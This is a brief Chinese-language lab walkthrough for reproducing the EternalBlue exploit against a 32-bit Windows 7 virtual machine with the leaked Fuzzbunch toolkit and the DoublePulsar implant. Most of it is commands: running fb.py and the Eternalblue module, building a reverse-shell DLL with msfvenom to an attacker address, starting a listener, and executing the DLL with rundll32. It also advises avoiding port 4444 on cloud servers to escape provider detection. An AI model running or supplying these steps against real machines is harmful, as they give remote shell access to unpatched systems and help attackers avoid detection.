环境
VMware® Workstation 16 Pro
Microsoft Windows 7家庭普通版 Service Pack 1 32-bit 6.1.7601
Windbg Preview1.2206.19001.0
攻击机环境
Python 2.6
pywin32-212.win32-py2.6.exe
fuzzbunch
PS:由于msf中没有x86的攻击payload,所以使用最开始的泄露工具集做利用
-
下载fuzzbunch后,修改xml文件信息,同时新建一个listeningposts文件夹
-
靶机需要关闭防火墙
漏洞复现
- 运行fuzzbunch,然后新建一个项目
python fb.py
- 使用永恒之蓝
use Eternalblue
-
看到Win就是成功了,但是还无法使用shell交互,需要使用Doublepulsar模块加载dll
-
成功后会有个成功显示
PS:如果是vps的msf,不要使用4444端口,云服务商有检测。不要使用meterpreter的反弹shell,win7下反弹报错。
相关命令
- msf生成shell命令
msfvenom -p windows/shell_reverse_tcp lhost=192.168.32.199 lport=8973 -f dll -o 8973.dll
- msf快速监听命令
handler -p windows/shell_reverse_tcp -H 0.0.0.0 -P 8973
- windows下反弹dll命令
rundll32.exe 8973.dll,0